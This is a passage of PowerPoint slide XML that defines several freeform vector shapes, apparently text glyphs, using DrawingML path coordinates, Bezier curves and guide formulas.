                    <a:pt x="34" y="155"/>
                    <a:pt x="34" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="63"/>
                    <a:pt x="67" y="31"/>
                    <a:pt x="102" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="31"/>
                    <a:pt x="170" y="63"/>
                    <a:pt x="170" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="155"/>
                    <a:pt x="139" y="192"/>
                    <a:pt x="102"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12" name="Freeform 853">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E13E245C-59B6-4E84-AB29-F9CD4B86E65A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId29"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2441576" y="1898651"/>
              <a:ext cx="82550" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 132 w 242"/>
                <a:gd name="T1" fmla="*/ 177 h 305"/>
                <a:gd name="T2" fmla="*/ 194 w 242"/>
                <a:gd name="T3" fmla="*/ 120 h 305"/>
                <a:gd name="T4" fmla="*/ 211 w 242"/>
                <a:gd name="T5" fmla="*/ 120 h 305"/>
                <a:gd name="T6" fmla="*/ 231 w 242"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 211 w 242"/>
                <a:gd name="T9" fmla="*/ 90 h 305"/>
                <a:gd name="T10" fmla="*/ 134 w 242"/>
                <a:gd name="T11" fmla="*/ 90 h 305"/>
                <a:gd name="T12" fmla="*/ 114 w 242"/>
                <a:gd name="T13" fmla="*/ 105 h 305"/>
                <a:gd name="T14" fmla="*/ 134 w 242"/>
                <a:gd name="T15" fmla="*/ 120 h 305"/>
                <a:gd name="T16" fmla="*/ 153 w 242"/>
                <a:gd name="T17" fmla="*/ 120 h 305"/>
                <a:gd name="T18" fmla="*/ 72 w 242"/>
                <a:gd name="T19" fmla="*/ 196 h 305"/>
                <a:gd name="T20" fmla="*/ 72 w 242"/>
                <a:gd name="T21" fmla="*/ 20 h 305"/>
                <a:gd name="T22" fmla="*/ 52 w 242"/>
                <a:gd name="T23" fmla="*/ 0 h 305"/>
                <a:gd name="T24" fmla="*/ 20 w 242"/>
                <a:gd name="T25" fmla="*/ 0 h 305"/>
                <a:gd name="T26" fmla="*/ 0 w 242"/>
                <a:gd name="T27" fmla="*/ 15 h 305"/>
                <a:gd name="T28" fmla="*/ 20 w 242"/>
                <a:gd name="T29" fmla="*/ 30 h 305"/>
                <a:gd name="T30" fmla="*/ 44 w 242"/>
                <a:gd name="T31" fmla="*/ 30 h 305"/>
                <a:gd name="T32" fmla="*/ 44 w 242"/>
                <a:gd name="T33" fmla="*/ 274 h 305"/>
                <a:gd name="T34" fmla="*/ 20 w 242"/>
                <a:gd name="T35" fmla="*/ 274 h 305"/>
                <a:gd name="T36" fmla="*/ 0 w 242"/>
                <a:gd name="T37" fmla="*/ 289 h 305"/>
                <a:gd name="T38" fmla="*/ 20 w 242"/>
                <a:gd name="T39" fmla="*/ 305 h 305"/>
                <a:gd name="T40" fmla="*/ 96 w 242"/>
                <a:gd name="T41" fmla="*/ 305 h 305"/>
                <a:gd name="T42" fmla="*/ 116 w 242"/>
                <a:gd name="T43" fmla="*/ 290 h 305"/>
                <a:gd name="T44" fmla="*/ 96 w 242"/>
                <a:gd name="T45" fmla="*/ 274 h 305"/>
                <a:gd name="T46" fmla="*/ 72 w 242"/>
                <a:gd name="T47" fmla="*/ 274 h 305"/>
                <a:gd name="T48" fmla="*/ 72 w 242"/>
                <a:gd name="T49" fmla="*/ 234 h 305"/>
                <a:gd name="T50" fmla="*/ 112 w 242"/>
                <a:gd name="T51" fmla="*/ 197 h 305"/>
                <a:gd name="T52" fmla="*/ 171 w 242"/>
                <a:gd name="T53" fmla="*/ 274 h 305"/>
                <a:gd name="T54" fmla="*/ 143 w 242"/>
                <a:gd name="T55" fmla="*/ 290 h 305"/>
                <a:gd name="T56" fmla="*/ 163 w 242"/>
                <a:gd name="T57" fmla="*/ 305 h 305"/>
                <a:gd name="T58" fmla="*/ 222 w 242"/>
                <a:gd name="T59" fmla="*/ 305 h 305"/>
                <a:gd name="T60" fmla="*/ 242 w 242"/>
                <a:gd name="T61" fmla="*/ 290 h 305"/>
                <a:gd name="T62" fmla="*/ 222 w 242"/>
                <a:gd name="T63" fmla="*/ 274 h 305"/>
                <a:gd name="T64" fmla="*/ 207 w 242"/>
                <a:gd name="T65" fmla="*/ 274 h 305"/>
                <a:gd name="T66" fmla="*/ 132 w 242"/>
                <a:gd name="T67" fmla="*/ 177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2" h="305">
                  <a:moveTo>
                    <a:pt x="132" y="177"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="194" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211" y="120"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="120"/>
                    <a:pt x="231" y="120"/>
                    <a:pt x="231" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="90"/>
                    <a:pt x="218" y="90"/>
                    <a:pt x="211" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="90"/>
                    <a:pt x="114" y="90"/>
                    <a:pt x="114" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="120"/>
                    <a:pt x="127" y="120"/>
                    <a:pt x="134" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="153" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="5"/>
                    <a:pt x="69" y="0"/>
                    <a:pt x="52" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="12" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="44" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="12" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="305"/>
                    <a:pt x="116" y="305"/>
                    <a:pt x="116" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="274"/>
                    <a:pt x="104" y="274"/>
                    <a:pt x="96" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="274"/>
                    <a:pt x="143" y="274"/>
                    <a:pt x="143" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="305"/>
                    <a:pt x="156" y="305"/>
                    <a:pt x="163" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="222" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="305"/>
                    <a:pt x="242" y="305"/>
                    <a:pt x="242" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="274"/>
                    <a:pt x="229" y="274"/>
                    <a:pt x="222" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132" y="17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13" name="Freeform 854">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{582C01DC-4ECC-4ADA-81BB-1E10BCA60817}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId30"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2536826" y="1928813"/>
              <a:ext cx="69850" cy="79375"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 223"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 223"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 223"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 223"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 223 h 223"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 223"/>
                <a:gd name="T12" fmla="*/ 187 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 223"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 223"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 223"/>
                <a:gd name="T18" fmla="*/ 35 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 223"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 223"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 223"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 31 h 223"/>
                <a:gd name="T26" fmla="*/ 169 w 204"/>
                <a:gd name="T27" fmla="*/ 94 h 223"/>
                <a:gd name="T28" fmla="*/ 36 w 204"/>
                <a:gd name="T29" fmla="*/ 9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3">
                  <a:moveTo>
                    <a:pt x="184" y="124"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="223"/>
                    <a:pt x="115" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="223"/>
                    <a:pt x="204" y="178"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="190" y="151"/>
                    <a:pt x="187" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="151"/>
                    <a:pt x="174" y="153"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="188"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="72" y="31"/>
                    <a:pt x="107" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="31"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="169"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14" name="Freeform 855">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14329052-2283-4A4D-9745-98DF96BDE72B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId31"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2619376" y="1930401"/>
              <a:ext cx="85725" cy="76200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 249"/>
                <a:gd name="T1" fmla="*/ 26 h 218"/>
                <a:gd name="T2" fmla="*/ 57 w 249"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 249"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 249"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 20 w 249"/>
                <a:gd name="T9" fmla="*/ 33 h 218"/>
                <a:gd name="T10" fmla="*/ 42 w 249"/>
                <a:gd name="T11" fmla="*/ 33 h 218"/>
                <a:gd name="T12" fmla="*/ 42 w 249"/>
                <a:gd name="T13" fmla="*/ 187 h 218"/>
                <a:gd name="T14" fmla="*/ 21 w 249"/>
                <a:gd name="T15" fmla="*/ 187 h 218"/>
                <a:gd name="T16" fmla="*/ 0 w 249"/>
                <a:gd name="T17" fmla="*/ 203 h 218"/>
                <a:gd name="T18" fmla="*/ 20 w 249"/>
                <a:gd name="T19" fmla="*/ 218 h 218"/>
                <a:gd name="T20" fmla="*/ 99 w 249"/>
                <a:gd name="T21" fmla="*/ 218 h 218"/>
                <a:gd name="T22" fmla="*/ 119 w 249"/>
                <a:gd name="T23" fmla="*/ 203 h 218"/>
                <a:gd name="T24" fmla="*/ 99 w 249"/>
                <a:gd name="T25" fmla="*/ 187 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 249"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 249"/>
                <a:gd name="T29" fmla="*/ 99 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 249"/>
                <a:gd name="T31" fmla="*/ 30 h 218"/>
                <a:gd name="T32" fmla="*/ 173 w 249"/>
                <a:gd name="T33" fmla="*/ 74 h 218"/>
                <a:gd name="T34" fmla="*/ 173 w 249"/>
                <a:gd name="T35" fmla="*/ 187 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 249"/>
                <a:gd name="T37" fmla="*/ 187 h 218"/>
                <a:gd name="T38" fmla="*/ 133 w 249"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 249"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 230 w 249"/>
                <a:gd name="T43" fmla="*/ 218 h 218"/>
                <a:gd name="T44" fmla="*/ 249 w 249"/>
                <a:gd name="T45" fmla="*/ 203 h 218"/>
                <a:gd name="T46" fmla="*/ 229 w 249"/>
                <a:gd name="T47" fmla="*/ 187 h 218"/>
                <a:gd name="T48" fmla="*/ 207 w 249"/>
                <a:gd name="T49" fmla="*/ 187 h 218"/>
                <a:gd name="T50" fmla="*/ 207 w 249"/>
                <a:gd name="T51" fmla="*/ 71 h 218"/>
                <a:gd name="T52" fmla="*/ 142 w 249"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 77 w 249"/>
                <a:gd name="T55" fmla="*/ 2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9" h="218">
                  <a:moveTo>
                    <a:pt x="77" y="26"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="10"/>
                    <a:pt x="77" y="3"/>
                    <a:pt x="57" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="13" y="33"/>
                    <a:pt x="20" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="187"/>
                    <a:pt x="0" y="187"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="13" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="218"/>
                    <a:pt x="119" y="218"/>
                    <a:pt x="119" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="187"/>
                    <a:pt x="107" y="187"/>
                    <a:pt x="99" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="49"/>
                    <a:pt x="114" y="30"/>
                    <a:pt x="139" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="30"/>
                    <a:pt x="173" y="44"/>
                    <a:pt x="173" y="74"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="187"/>
                    <a:pt x="133" y="187"/>
                    <a:pt x="133" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="218"/>
                    <a:pt x="146" y="218"/>
                    <a:pt x="153" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="230" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="218"/>
                    <a:pt x="249" y="218"/>
                    <a:pt x="249" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="187"/>
                    <a:pt x="237" y="187"/>
                    <a:pt x="229" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="71"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="21"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="142" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="0"/>
                    <a:pt x="86" y="17"/>
                    <a:pt x="77" y="2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15" name="Freeform 856">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1F086D0-F4BE-486F-9280-AA671A3642FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId32"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2728913" y="1897063"/>
              <a:ext cx="47625" cy="52388"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 46 w 136"/>
                <a:gd name="T1" fmla="*/ 28 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 136"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 2 w 136"/>
                <a:gd name="T5" fmla="*/ 28 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 136"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 136"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 40 w 136"/>
                <a:gd name="T11" fmla="*/ 130 h 147"/>
                <a:gd name="T12" fmla="*/ 46 w 136"/>
                <a:gd name="T13" fmla="*/ 28 h 147"/>
                <a:gd name="T14" fmla="*/ 135 w 136"/>
                <a:gd name="T15" fmla="*/ 28 h 147"/>
                <a:gd name="T16" fmla="*/ 113 w 136"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 90 w 136"/>
                <a:gd name="T19" fmla="*/ 28 h 147"/>
                <a:gd name="T20" fmla="*/ 97 w 136"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 113 w 136"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 128 w 136"/>
                <a:gd name="T25" fmla="*/ 130 h 147"/>
                <a:gd name="T26" fmla="*/ 135 w 136"/>
                <a:gd name="T27" fmla="*/ 2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47">
                  <a:moveTo>
                    <a:pt x="46" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="4"/>
                    <a:pt x="31" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="2" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="147"/>
                    <a:pt x="39" y="138"/>
                    <a:pt x="40" y="130"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46" y="28"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="135" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="4"/>
                    <a:pt x="119" y="0"/>
                    <a:pt x="113" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="0"/>
                    <a:pt x="89" y="6"/>
                    <a:pt x="90" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="97" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="136"/>
                    <a:pt x="99" y="147"/>
                    <a:pt x="113" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="147"/>
                    <a:pt x="128" y="138"/>
                    <a:pt x="128" y="130"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="135"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16" name="Freeform 857">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE6D1FF3-3EA4-488A-A8DF-2BE71396FC68}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId33"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2833688" y="1930401"/>
              <a:ext cx="20638" cy="76200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 31 h 215"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 215"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 62 h 215"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 31 h 215"/>
                <a:gd name="T10" fmla="*/ 62 w 62"/>
                <a:gd name="T11" fmla="*/ 184 h 215"/>
                <a:gd name="T12" fmla="*/ 31 w 62"/>
                <a:gd name="T13" fmla="*/ 152 h 215"/>
                <a:gd name="T14" fmla="*/ 0 w 62"/>
                <a:gd name="T15" fmla="*/ 183 h 215"/>
                <a:gd name="T16" fmla="*/ 31 w 62"/>
                <a:gd name="T17" fmla="*/ 215 h 215"/>
                <a:gd name="T18" fmla="*/ 62 w 62"/>
                <a:gd name="T19" fmla="*/ 1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15">
                  <a:moveTo>
                    <a:pt x="62" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="62"/>
                    <a:pt x="62" y="46"/>
                    <a:pt x="62" y="31"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="62" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="165"/>
                    <a:pt x="47" y="152"/>
                    <a:pt x="31" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="152"/>
                    <a:pt x="0" y="168"/>
                    <a:pt x="0" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="202"/>
                    <a:pt x="15" y="215"/>
                    <a:pt x="31" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="215"/>
                    <a:pt x="62" y="199"/>
                    <a:pt x="62" y="18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17" name="Freeform 858">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34219479-6F69-4964-AE0F-9AFC734A85C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId34"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2901951" y="1874838"/>
              <a:ext cx="60325" cy="174625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 105 w 177"/>
                <a:gd name="T1" fmla="*/ 66 h 498"/>
                <a:gd name="T2" fmla="*/ 172 w 177"/>
                <a:gd name="T3" fmla="*/ 11 h 498"/>
                <a:gd name="T4" fmla="*/ 177 w 177"/>
                <a:gd name="T5" fmla="*/ 5 h 498"/>
                <a:gd name="T6" fmla="*/ 167 w 177"/>
                <a:gd name="T7" fmla="*/ 0 h 498"/>
                <a:gd name="T8" fmla="*/ 71 w 177"/>
                <a:gd name="T9" fmla="*/ 62 h 498"/>
                <a:gd name="T10" fmla="*/ 71 w 177"/>
                <a:gd name="T11" fmla="*/ 176 h 498"/>
                <a:gd name="T12" fmla="*/ 51 w 177"/>
                <a:gd name="T13" fmla="*/ 227 h 498"/>
                <a:gd name="T14" fmla="*/ 4 w 177"/>
